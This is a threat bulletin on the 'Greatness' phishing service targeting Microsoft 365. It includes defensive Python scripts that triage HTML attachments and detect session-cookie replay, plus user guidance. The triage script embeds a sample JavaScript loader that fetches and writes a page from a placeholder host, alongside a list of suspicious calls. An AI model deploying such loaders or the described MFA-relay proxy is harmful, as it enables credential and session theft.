New ‘Greatness’ Service Simplifies Microsoft 365 Phishing Attacks

Cyber Security Threat Summary:
Greatness, a phishing-as-a-service (PhaaS) platform, has seen a surge in activity as it targets organizations that use Microsoft 365 in the United States, Canada, the U.K., Australia, and South Africa. As a widely used cloud-based productivity platform, Microsoft 365 is highly coveted by cybercriminals seeking to steal data or login credentials for use in network intrusions. According to a recent report from Cisco Talos, the Greatness phishing platform was established in mid-2022, with significant upsurges in activity in December 2022 and again in March 2023. The majority of targets are in the United States, with victims spread across diverse sectors, including manufacturing, healthcare, technology, education, real estate, construction, finance, and business services.

To initiate an attack, the user of the service logs in to the Greatness admin panel with their API key and submits a list of target email addresses. The PhaaS platform then provisions the infrastructure, including the server that hosts the phishing page, and generates the HTML attachment.

“The affiliate then crafts the email content and provides any other material or changes to the default settings as needed. The service then emails the victims, who receive a phishing email with an HTML attachment. When this attachment is opened, obfuscated JavaScript code is executed in the browser to connect with the 'Greatness' server to fetch the phishing page that will be displayed to the user. The phishing service will automatically inject the target's company logo and background image from the employer's actual Microsoft 365 login page. The victim only enters their password on the convincing phishing page, as Greatness pre-fills the correct email to create a sense of legitimacy. At this stage, the phishing platform acts as a proxy between the victim's browser and the actual Microsoft 365 login page, handling the authentication flow to obtain a valid session cookie for the target account. If the account is protected by two-factor authentication, Greatness will prompt the victim to provide it while triggering a request on the real Microsoft service, so the one-time code is sent to the target's device” (Bleeping Computer, 2023). Once the MFA code is provided, Greatness completes the authentication as the victim on the real Microsoft platform and delivers the resulting session cookie to the affiliate, either via a Telegram channel or through the service's web panel.
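The HTML attachment described above is a small loader: the page itself contains no credential form, only obfuscated JavaScript that contacts a remote server and writes the fetched phishing page into the document. The script below is an added example (not part of the original article, nor Cisco Talos or Bleeping Computer code) of how a mail gateway or incident responder could statically triage such an attachment: it collects every script element, decodes long base64 string literals, extracts remote URLs from both the raw script and the decoded strings, and scores loader-style calls. The sample attachment, the placeholder domain loader.example.invalid, and the scoring weights are all constructed assumptions, not real Greatness indicators.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed sample attachment (not a real Greatness artifact) that follows
# the loader pattern described above: a base64-encoded URL is decoded at
# runtime, fetched, and written into the page. The domain is a placeholder.
_LOADER_URL = "https://loader.example.invalid/page?id=abc123"
_ENCODED = base64.b64encode(_LOADER_URL.encode()).decode()
SAMPLE_ATTACHMENT = f"""<html><body><p>Loading secure document...</p>
<script>
var u = atob("{_ENCODED}");
fetch(u).then(r => r.text()).then(t => document.write(t));
</script></body></html>"""

# Constructed benign attachment with no script content.
BENIGN_ATTACHMENT = "<html><body><h1>Invoice 1234</h1><p>Total: 100 EUR</p></body></html>"

# Calls typical of a small loader stage; any one alone is common in benign
# pages, so they are scored together with decoded strings and remote URLs.
SUSPICIOUS_CALLS = ("atob(", "unescape(", "eval(", "document.write(",
                    "fetch(", "XMLHttpRequest", "location.replace(")
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
URL = re.compile(r'https?://[^\s"\'<>]+')


class _ScriptCollector(HTMLParser):
    """Collect the text of every <script> element."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def decode_base64_literals(js):
    """Return the printable decodings of long base64 string literals in js."""
    found = []
    for match in B64_LITERAL.finditer(js):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append(text)
    return found


def triage_html_attachment(html):
    """Static triage of an HTML attachment; returns indicators and a verdict."""
    collector = _ScriptCollector()
    collector.feed(html)
    js = "\n".join(collector.scripts)
    decoded = decode_base64_literals(js)
    urls = set(URL.findall(js))
    for text in decoded:
        urls.update(URL.findall(text))
    calls = sorted(c for c in SUSPICIOUS_CALLS if c in js)
    # Heuristic weighting (an assumption, not a published rule): decoded
    # literals and remote fetch targets count more than individual calls.
    score = len(calls) + (2 if decoded else 0) + (2 if urls else 0)
    return {
        "script_count": len(collector.scripts),
        "suspicious_calls": calls,
        "decoded_literals": decoded,
        "remote_urls": sorted(urls),
        "verdict": "suspicious" if score >= 3 else "clean",
    }


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(name, triage_html_attachment(doc))
```

The extracted remote URL is the useful artifact: it identifies the server the loader contacts and can be blocked or submitted for takedown. Real loaders often split or XOR the string rather than using a single base64 literal, so treat the score as a triage signal, not a verdict, and detonate anything that scores high in a sandbox.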

Security Officer Comments:
Greatness bundles all the components a novice phishing actor needs to run a successful campaign. As Cisco notes, authenticated sessions usually expire after a certain period, which is why the Telegram bot is used to notify the attacker of valid cookies promptly, so they can act quickly if the target is valuable. Once obtained, the session cookie can be used to access the victim's emails, files, and data in Microsoft 365 services. Because the attacker holds a valid authenticated session rather than just a password, one-time-code MFA does not stop the takeover, and response should include revoking the account's active sessions, not only resetting the password. Stolen credentials are also frequently used to breach corporate networks, leading to further malicious activity such as ransomware deployment.
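One detection opportunity follows directly from the flow above: the victim's MFA-backed sign-in is completed through the phishing proxy, and the resulting cookie is then replayed by the affiliate from yet another machine within the session's lifetime. The script below is an added example (not from the article or from Cisco Talos) of that heuristic run over constructed sign-in records. The records are loosely modelled on Entra ID sign-in log fields (user principal name, IP address, user agent, session ID, timestamp, interactivity, MFA result) but are fabricated, use documentation IP ranges, and the 24-hour lifetime is an assumed value to be tuned to the tenant's session policy.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events, loosely modelled on Entra ID sign-in log fields.
# Not real log data; addresses are documentation ranges and users are placeholders.
EVENTS = [
    # Normal user: interactive MFA sign-in, then token use from the same device.
    {"user": "alice@example.invalid", "ip": "203.0.113.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/112", "session": "s-1",
     "time": "2023-05-08T09:00:00Z", "interactive": True, "mfa": True},
    {"user": "alice@example.invalid", "ip": "203.0.113.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/112", "session": "s-1",
     "time": "2023-05-08T10:15:00Z", "interactive": False, "mfa": False},
    # Victim: MFA-completed login relayed through the phishing proxy, then the
    # same session used minutes later from another address and client.
    {"user": "bob@example.invalid", "ip": "198.51.100.7",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Edge/112", "session": "s-2",
     "time": "2023-05-08T11:00:00Z", "interactive": True, "mfa": True},
    {"user": "bob@example.invalid", "ip": "192.0.2.44",
     "ua": "python-requests/2.28", "session": "s-2",
     "time": "2023-05-08T11:07:00Z", "interactive": False, "mfa": False},
]

# Assumed maximum useful lifetime of a stolen cookie; tune to tenant policy.
SESSION_LIFETIME = timedelta(hours=24)


def _parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def find_session_replays(events, lifetime=SESSION_LIFETIME):
    """Flag sessions whose MFA-backed interactive sign-in is followed, within
    lifetime, by activity from a different IP *and* user agent. Requiring both
    to differ avoids alerting on a laptop that merely changes networks."""
    by_session = defaultdict(list)
    for event in events:
        by_session[event["session"]].append(event)

    alerts = []
    for session_id, evs in by_session.items():
        evs.sort(key=lambda e: _parse_time(e["time"]))
        anchors = [e for e in evs if e["interactive"] and e["mfa"]]
        if not anchors:
            continue
        origin = anchors[0]
        origin_time = _parse_time(origin["time"])
        for event in evs:
            if event is origin:
                continue
            elapsed = _parse_time(event["time"]) - origin_time
            if not (timedelta(0) <= elapsed <= lifetime):
                continue
            if event["ip"] != origin["ip"] and event["ua"] != origin["ua"]:
                alerts.append({
                    "user": event["user"],
                    "session": session_id,
                    "origin_ip": origin["ip"],
                    "replay_ip": event["ip"],
                    "replay_ua": event["ua"],
                    "minutes_after_mfa": int(elapsed.total_seconds() // 60),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_session_replays(EVENTS):
        print(alert)
```

Note that in this attack the interactive sign-in itself already comes from the proxy's address rather than the victim's device, so the "origin" IP in an alert is worth checking against known corporate egress ranges as well. When an alert fires, revoking the user's sessions invalidates the replayed cookie regardless of its remaining lifetime.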

Suggested Corrections:
Users should always be cautious of individuals or organizations that ask for personal information. Most companies will not ask for sensitive data from their customers by email. If in doubt, users should verify with the company itself through a known contact channel.

Users should look closely at the sender's actual address, not just the display name, when checking the legitimacy of an email. Most companies use a single domain for their websites and email, so a message that originates from a different domain is a red flag.

As a general rule, users should not click links or open attachments they were not expecting, even when they appear to come from a trustworthy source. Because the Greatness lure is an HTML attachment that loads its content from a remote server, organizations should also consider quarantining or blocking .htm and .html attachments at the mail gateway where business workflows allow.

Check for mismatched URLs. While an embedded URL might seem perfectly valid, hovering above it might show a different web address. In fact, users should avoid clicking links in emails unless they are certain that it is a legitimate link.

Users should always be on the lookout for any grammatical errors and spelling mistakes. Legitimate companies will often employ proofreaders and editors who ensure that the materials they send out are error-free.

Users should not be frightened or intimidated by messages that have an alarmist tone. They should double check with the company if they are uncertain about the status of their accounts.

Phishing emails are designed to be sent to a large number of people, so they are often impersonal. A generic subject line and greeting can be a sign of a phishing attempt. Note that Greatness partly defeats this check by pre-filling the target's email address and injecting the employer's logo on the phishing page, so a personalized-looking page is not proof of legitimacy.

Although not every end user has access to advanced anti-phishing software, they can still use the built-in protection of their email clients to filter messages, for example by blocking remote images until the sender is approved.

Legitimate companies rarely send confirmation emails without a specific reason, and most avoid unsolicited messages other than company updates, newsletters, or advertising.

Users should always take the context of an email or message into account. For example, most online accounts do away with viewable member numbers, so users should be wary if they receive emails containing a “member number” for services that generally don’t use them.

It is important to take note of unusual information in the text of the message. Any mentions of operating systems and software that are not typically used by consumers can often be indicators of a phishing attempt.

If it seems suspicious, it probably is. Users should always err on the side of caution when it comes to sending out personally identifiable information through messages and emails.

Link(s):
https://www.bleepingcomputer.com/